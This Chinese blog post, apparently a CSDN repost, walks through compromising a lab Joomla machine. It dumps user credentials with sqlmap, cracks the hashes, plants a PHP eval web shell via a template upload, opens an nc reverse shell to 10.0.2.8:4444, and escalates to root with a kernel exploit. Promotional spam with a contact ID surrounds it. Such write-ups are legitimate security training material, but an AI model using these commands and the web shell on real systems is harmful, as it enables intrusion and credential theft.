先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7
深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
正文
[![](https://img-blog.csdnimg.cn/img_convert/d257066f4e2a749a19f98a0e3e0bfc86.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161609244-1373164183.png)
##### 4.我们爆username,和password
sqlmap -u “http://10.0.2.19/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D ‘joomladb’ -T ‘#__users’ -C ‘username,password’ --dump -p list[fullordering]
[![](https://img-blog.csdnimg.cn/img_convert/9e5b5303f8821310c96151b3dcd38c41.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161619374-364426582.png)
得到密码不过密码是hash加密
##### 5.john爆破
[![](https://img-blog.csdnimg.cn/img_convert/d76a24c3997d55c50098b75f2a635dfa.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161630894-690286466.png)
##### 6.登陆进去
[![](https://img-blog.csdnimg.cn/img_convert/a6b3f8f4bea545851f3327fd50c3c281.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161642991-811351378.png)
这个时候我们想起我们扫描的目录
[![](https://img-blog.csdnimg.cn/img_convert/5b90933d665d75c94bc36a7eed0fb4ee.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161656984-1247039469.png)
我们找到了这个目录
[![](https://img-blog.csdnimg.cn/img_convert/a4405489c2c9e5ca840c0ad7eeb977a6.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161709139-1131934629.png)
[Top]( )
### 四.文件上传
#### 1.我们在beez3的下面找到了可以上传的地方
[![](https://img-blog.csdnimg.cn/img_convert/4a04ea7fe5a4c8c6f3f91191802b4f29.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161723583-1563876879.png)
我们在html的目录下写入text.php
#### 2.在text.php中加入木马文件
text.php
echo “a”;
<?php @eval($_POST['a'])?>
#### 3.访问木马文件
>
> [http://10.0.2.19/templates/beez3/html/text.php]( )
>
>
>
显示
[![](https://img-blog.csdnimg.cn/img_convert/b739733cc263b5bd451810fa67505a12.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161740518-49940846.png)
显示出来这个说明我们的木马文件写入进去了
成功写入蚁剑
[![](https://img-blog.csdnimg.cn/img_convert/3b7e59daca1b0a98ef49c3408e99616d.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161751252-603903352.png)
#### 4.终端中执行命令
[![](https://img-blog.csdnimg.cn/img_convert/5174d587fa88e0f0ec0e974ba1c3d15d.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161804260-1869838782.png)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.2.8 4444 >/tmp/f
命令解释 rm /tmp/f删除文件
mkfifo /tmp/f
FIFO 是一种特殊类型的文件,用于在不同的进程之间进行通信。它的工作原理类似于队列,数据按照先进先出的顺序传输。
通过使用命名管道,可以实现多个进程之间的数据传输。一个进程可以将数据写入命名管道,另一个进程可以从命名管道读取这些数据。这种通信方式可以用于各种目的,例如在多个程序之间共享数据、进程间通信等。
cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.2.8 4444 >/tmp/f
它将创建一个名为 /tmp/f 的文件,将该文件中的内容通过一个管道传递给 /bin/bash 命令,使得 /bin/bash 命令可以以交互式 Shell 的形式运行。然后,命令将通过网络连接(使用 nc 命令)将 /bin/bash 命令的输出重定向到 IP 地址为 10.0.2.8,端口为 4444 的远程主机上。同时,命令将 /bin/bash命令的输入重定向回 /tmp/f 文件中
简单来说就是我们通过用nc反弹到主机上将/bin/bash输入上
#### 5.nc反弹
反弹成功
[![](https://img-blog.csdnimg.cn/img_convert/8dd6adb1dd3dafcf2f4539e24cb2b0f2.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161814258-1959775093.png)
我们要得到root权限
[Top]( )
### 五.提权
#### 1.我们sudo -l看是否有可以用的
[![](https://img-blog.csdnimg.cn/img_convert/8bc4336410fdc5542db15c97d06d7bc7.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161824694-1352602981.png)
#### 2.我们查看内核
[![](https://img-blog.csdnimg.cn/img_convert/e353849d99cd92b01947524c1b763d02.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161835855-1728563407.png)
ng)
我们看到内核版本
看luinx版本
[![](https://img-blog.csdnimg.cn/img_convert/432e47cd18b1a240f73b0780eef8628f.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161847706-2024896861.png)
#### 3.searchsploit 查询版本漏洞
[![](https://img-blog.csdnimg.cn/img_convert/17ca1a06e96d55b9deca7bad6f713e7e.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161903328-1189481960.png)
我们用searchsploit -x linux/local/39772.txt来查看在最后面有下载地址
[![](https://img-blog.csdnimg.cn/img_convert/f27a9ec8e28e07fda440186a9944efba.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161914665-1385081061.png)
#### 4.我们在本地开启服务
我用我的kali机下载到了本地的桌面上
我们在本地开启服务
[![](https://img-blog.csdnimg.cn/img_convert/5f434efef448496cbba00bb0af198176.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161924973-1244903197.png)
在浏览器访问一下我们发现了访问地址
[![](https://img-blog.csdnimg.cn/img_convert/aea96218e63e7439b8cd4642a0e1c2de.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161936336-362508569.png)
#### 5.我们在反弹的机上使用
[![](https://img-blog.csdnimg.cn/img_convert/a45224cb24e430c5b1ffdb04b5bdea85.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416161953540-110778882.png)
unzip 39772.zip
cd 39772
ls
tar xvf exploit.tar
ls
cd ebpf_mapfd_doubleput_exploit
[![](https://img-blog.csdnimg.cn/img_convert/4ec643920b8c232900509d5593602a73.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416162012471-1720575394.png)
[![](https://img-blog.csdnimg.cn/img_convert/2ead85488ab803bae483b4a08ca4267e.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416162025496-871753693.png)
#### 6.对文件complie.sh加权限
[![](https://img-blog.csdnimg.cn/img_convert/d2720b657d9322e2a1db6d8a22a02b94.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416162036185-1418742171.png)
编译文件
[![](https://img-blog.csdnimg.cn/img_convert/4ef6cd6288a16a4139ecdddb338c0c57.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416162046557-694628150.png)
#### 7.查看文件
[![](https://img-blog.csdnimg.cn/img_convert/55c4413b2a2fcf358c66e66100b4d6b2.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416162056210-1124345749.png)
#### 8.提取文件
[![](https://img-blog.csdnimg.cn/img_convert/754b7b6aaf699b694d1c6ea58392a69f.png)](https://img2023.cnblogs.com/blog/2860184/202304/2860184-20230416162106834-1733822562.png)
### 如何自学黑客&网络安全
#### 黑客零基础入门学习路线&规划
**初级黑客**
**1、网络安全理论知识(2天)**
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
**2、渗透测试基础(一周)**
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
**3、操作系统基础(一周)**
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)
**4、计算机网络基础(一周)**
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
**5、数据库基础操作(2天)**
①数据库基础
②SQL语言基础
③数据库安全加固
**6、Web渗透(1周)**
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k
到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?
如果你想要入坑黑客&网络安全,笔者给大家准备了一份:282G全网最全的网络安全资料包评论区留言即可领取!
**7、脚本编程(初级/中级/高级)**
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.
如果你零基础入门,笔者建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习;搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime;·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;·用Python编写漏洞的exp,然后写一个简单的网络爬虫;·PHP基本语法学习并书写一个简单的博客系统;熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选);·了解Bootstrap的布局或者CSS。
**8、超级黑客**
这部分内容对零基础的同学来说还比较遥远,就不展开细说了,附上学习路线。
![img](https://img-blog.csdnimg.cn/img_convert/3fd39c2ba8ec22649979f245f4221608.webp?x-oss-process=image/format,png)
#### 网络安全工程师企业级学习路线
![img](https://img-blog.csdnimg.cn/img_convert/931ac5ac21a22d230645ccf767358997.webp?x-oss-process=image/format,png)
如图片过大被平台压缩导致看不清的话,评论区点赞和评论区留言获取吧。我都会回复的
视频配套资料&国内外网安书籍、文档&工具
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
![img](https://img-blog.csdnimg.cn/img_convert/153b2778a3fe5198265bed9635d63469.webp?x-oss-process=image/format,png)
一些笔者自己买的、其他平台白嫖不到的视频教程。
![img](https://img-blog.csdnimg.cn/img_convert/32eb4b22aa740233c5198d3c161b37e8.webp?x-oss-process=image/format,png)
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
![img](https://img-blog.csdnimg.cn/img_convert/b42e4daa44cd0b476d2755b9e5556e73.png)
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
![img](https://img-blog.csdnimg.cn/img_convert/32eb4b22aa740233c5198d3c161b37e8.webp?x-oss-process=image/format,png)
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
[外链图片转存中...(img-roOKQNWW-1713125836362)]
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**